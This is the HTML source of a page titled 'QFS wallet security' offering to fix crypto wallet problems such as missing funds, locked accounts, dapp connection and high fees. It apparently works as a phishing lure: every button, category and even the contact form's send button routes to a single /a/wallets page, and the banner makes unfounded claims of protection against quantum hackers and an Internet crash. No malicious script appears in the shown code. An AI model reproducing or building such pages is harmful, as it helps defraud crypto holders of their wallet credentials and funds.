<!DOCTYPE html>
<html>
  <head>
    <title>QFS wallet security</title>
    <meta charset="utf-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, user-scalable=no"
    />

    <link
      rel="icon"
      type="image/png"
      sizes="32x32"
      href="/public/images/qfsdapps-favicon-black.png"
    />

    <link
      rel="icon"
      type="image/png"
      sizes="16x16"
      href="/public/images/qfsdapps-favicon-black.png"
    />

    <link rel="stylesheet" href="/public/assets/css/main.css" />

    <noscript>
      <link rel="stylesheet" href="/public/assets/css/noscript.css" />
    </noscript>
  </head>
  <body class="is-preload">
    <!-- Page Wrapper -->
    <div id="page-wrapper">
      <div class="logo" style="padding: 20px; text-align: center">
        <img
          id="logo"
          src="/public/images/qfsdapps-favicon-color.png"
          alt="My Website Logo"
        />
      </div>
      <!-- Header -->
      <header id="header" class="alt">
        <h1 style="font-size: larger"><a href="/">QFS wallet security</a></h1>
        <!-- <nav>
							<a href="#menu">Menu</a>
						</nav> -->
      </header>

      <!-- Menu -->
      <!-- <nav id="menu">
						<div class="inner">
							<h2>Menu</h2>
							<ul class="links">
								<li><a href="index.html">Home</a></li>
								<li><a href="generic.html">Generic</a></li>
								<li><a href="elements.html">Elements</a></li>
								<li><a href="#">Log In</a></li>
								<li><a href="#">Sign Up</a></li>
							</ul>
							<a href="#" class="close">Close</a>
						</div>
					</nav> -->

      <!-- Banner -->
      <section id="banner">
        <div class="inner">
          <h1></h1>
          <div class="logo" style="display: flex; justify-content: center">
            <img src="/public/images/11999316.png" alt="" />
          </div>
          <!-- <h2>This is Solid State</h2> -->
          <h1 style="text-align: center">
            Assists in safeguarding all your digital assets to mitigate the
            risks posed by cyber threats, including potential attacks from
            quantum computer hackers and the possibility of an Internet crash.
          </h1>
          <div style="display: flex; justify-content: center">
            <a href="/a/wallets">
              <button style="width: 150px; background-color: #4caf50">
                Secure Now
              </button>
            </a>
          </div>
        </div>
      </section>

      <!-- Wrapper -->
      <section id="wrapper">
        <!-- One -->
        <!-- <section id="one" class="wrapper spotlight style1">
								<div class="inner">
									<a href="#" class="image"><img src="images/pic01.jpg" alt="" /></a>
									<div class="content">
										<h2 class="major">Magna arcu feugiat</h2>
										<p>Lorem ipsum dolor sit amet, etiam lorem adipiscing elit. Cras turpis ante, nullam sit amet turpis non, sollicitudin posuere urna. Mauris id tellus arcu. Nunc vehicula id nulla dignissim dapibus. Nullam ultrices, neque et faucibus viverra, ex nulla cursus.</p>
										<a href="#" class="special">Learn more</a>
									</div>
								</div>
							</section> -->

        <!-- Two -->
        <!-- <section id="two" class="wrapper alt spotlight style2">
								<div class="inner">
									<a href="#" class="image"><img src="images/pic02.jpg" alt="" /></a>
									<div class="content">
										<h2 class="major">Tempus adipiscing</h2>
										<p>Lorem ipsum dolor sit amet, etiam lorem adipiscing elit. Cras turpis ante, nullam sit amet turpis non, sollicitudin posuere urna. Mauris id tellus arcu. Nunc vehicula id nulla dignissim dapibus. Nullam ultrices, neque et faucibus viverra, ex nulla cursus.</p>
										<a href="#" class="special">Learn more</a>
									</div>
								</div>
							</section> -->

        <!-- Three -->
        <!-- <section id="three" class="wrapper spotlight style3">
								<div class="inner">
									<a href="#" class="image"><img src="images/pic03.jpg" alt="" /></a>
									<div class="content">
										<h2 class="major">Nullam dignissim</h2>
										<p>Lorem ipsum dolor sit amet, etiam lorem adipiscing elit. Cras turpis ante, nullam sit amet turpis non, sollicitudin posuere urna. Mauris id tellus arcu. Nunc vehicula id nulla dignissim dapibus. Nullam ultrices, neque et faucibus viverra, ex nulla cursus.</p>
										<a href="#" class="special">Learn more</a>
									</div>
								</div>
							</section> -->

        <!-- Four -->
        <section id="four" class="wrapper alt style1">
          <div class="inner">
            <h2 class="major">Issue Category</h2>
            <p>Kindly select the category related to your issue</p>
            <section class="features">
              <article>
                <a href="/a/wallets" class="image">
                  <img src="/public/images/swap-removebg-preview.png" alt="" />
                </a>
                <h1 class="major">Swap/Exchange</h1>
                <a href="/a/wallets">
                  <p>
                    We will support you in any related issues with swaping
                    and/or exchange of coins. Kindly click here.
                  </p>
                </a>
              </article>

              <article>
                <a href="/a/wallets" class="image">
                  <img src="/public/images/nft-removebg-preview.png" alt="" />
                </a>
                <h1 class="major">NFT Mint</h1>
                <a href="/a/wallets">
                  <p>
                    Click here to turn your digital content into NFT by
                    uploading them here
                  </p>
                </a>
              </article>

              <article>
                <a href="/a/wallets" class="image">
                  <img src="/public/images/Dapp.png" alt="" />
                </a>
                <h1 class="major">connect to dapps</h1>
                <a href="/a/wallets">
                  <p>
                    Connect decentralised web applications to mobile wallets.
                    Enable DAPP on mobile wallet/ Extension. Kindly click here.
                  </p>
                </a>
              </article>

              <article>
                <a href="/a/wallets" class="image">
                  <img src="/public/images/login-removebg-preview.png" alt="" />
                </a>
                <h1 class="major">login issues</h1>
                <a href="/a/wallets">
                  <p>
                    Do you have issues accessing your wallet? Kindly click here.
                  </p>
                </a>
              </article>
              <article>
                <a href="/a/wallets" class="image"
                  ><img
                    src="/public/images/missing_funds-removebg-preview.png"
                    alt=""
                /></a>
                <h1 class="major">missing funds</h1>
                <a href="/a/wallets"
                  ><p>
                    Lost access to funds or funds is missing? Kindly click here.
                  </p></a
                >
              </article>
              <article>
                <a href="/a/wallets" class="image"
                  ><img src="/public/images/hign-removebg-preview.png" alt=""
                /></a>
                <h1 class="major">high fees</h1>
                <a href="/a/wallets"
                  ><p>Increase in transaction fees? Kindly click here.</p></a
                >
              </article>
              <article>
                <a href="/a/wallets" class="image"
                  ><img src="/public/images/migration.png" alt=""
                /></a>
                <h1 class="major">migrate</h1>
                <a href="/a/wallets"
                  ><p>
                    Do you have issues with migrations? Kindly click here
                  </p></a
                >
              </article>
              <article>
                <a href="/a/wallets" class="image"
                  ><img src="/public/images/trans.png" alt=""
                /></a>
                <h1 class="major">transaction delay</h1>
                <a href="/a/wallets"
                  ><p>
                    Do you have issues with transactions being delayed? Kindly
                    click here
                  </p></a
                >
              </article>
              <article>
                <a href="/a/wallets" class="image"
                  ><img src="/public/images/wallet-removebg-preview.png" alt=""
                /></a>
                <h1 class="major">issues with trading wallet</h1>
                <a href="/a/wallets"
                  ><p>
                    Do you have probems with your trading account? Kindly click
                    here.
                  </p></a
                >
              </article>
              <article>
                <a href="/a/wallets" class="image"
                  ><img src="/public/images/pie1.png" alt=""
                /></a>
                <h1 class="major">unable to purchase coins</h1>
                <a href="/a/wallets"
                  ><p>
                    if your account is not recognized as a trusted payment
                    source you may not be able to buy crypto and add coins
                    Kindly click here and follow the process to get started.
                  </p></a
                >
              </article>
              <article>
                <a href="/a/wallets" class="image"
                  ><img
                    src="/public/images/user_lock-removebg-preview.png"
                    alt=""
                /></a>
                <h1 class="major">locked account</h1>
                <a href="/a/wallets"
                  ><p>
                    if you are logged out due to activity on the account Kindly
                    click here.
                  </p></a
                >
              </article>
            </section>
            <!-- <ul class="actions">
										<li><a href="#" class="button">Browse All</a></li>
									</ul> -->
          </div>
        </section>
      </section>

      <!-- Footer -->
      <section id="footer">
        <div class="inner">
          <h2 class="major" style="text-align: center">Get in touch</h2>
          <p style="text-align: center">
            We are committed to assisting you with any issues related to your
            wallet account. Our dedicated support team is here to provide
            comprehensive help, ensuring your experience is as seamless and
            secure as possible.
          </p>
          <div style="display: flex; justify-content: center">
            <form method="post" action="#">
              <div class="fields">
                <div class="field">
                  <label for="name">Name</label>
                  <input type="text" name="name" id="name" />
                </div>
                <div class="field">
                  <label for="email">Email</label>
                  <input type="email" name="email" id="email" />
                </div>
                <div class="field">
                  <label for="message">Message</label>
                  <textarea name="message" id="message" rows="4"></textarea>
                </div>
              </div>
            </form>
          </div>

          <div style="display: flex; justify-content: center">
            <a href="/a/wallets">
              <button style="width: 220px; background-color: #4caf50">
                Send Message
              </button>
            </a>
          </div>
          <!-- <ul class="contact">
								<li class="icon solid fa-home">
									Untitled Inc<br />
									1234 Somewhere Road Suite #2894<br />
									Nashville, TN 00000-0000
								</li>
								<li class="icon solid fa-phone">(000) 000-0000</li>
								<li class="icon solid fa-envelope"><a href="#">information@untitled.tld</a></li>
								<li class="icon brands fa-twitter"><a href="#">twitter.com/untitled-tld</a></li>
								<li class="icon brands fa-facebook-f"><a href="#">facebook.com/untitled-tld</a></li>
								<li class="icon brands fa-instagram"><a href="#">instagram.com/untitled-tld</a></li>
							</ul> -->

          <ul
            class="copyright"
            style="display: flex; flex-direction: column; align-items: center"
          >
            <li>
              <a href="/a/terms">
                <p style="color: white; font-size: 15px; font-weight: 700">
                  Terms & Condition / Privacy Policy.
                </p>
              </a>
            </li>
            <li>&copy; QFS wallet security. All rights reserved.</li>
          </ul>
        </div>
      </section>
    </div>

    <!-- Scripts -->
    <script src="/public/assets/js/jquery.min.js"></script>
    <script src="/public/assets/js/jquery.scrollex.min.js"></script>
    <script src="/public/assets/js/browser.min.js"></script>
    <script src="/public/assets/js/breakpoints.min.js"></script>
    <script src="/public/assets/js/util.js"></script>
    <script src="/public/assets/js/main.js"></script>
  </body>
</html>
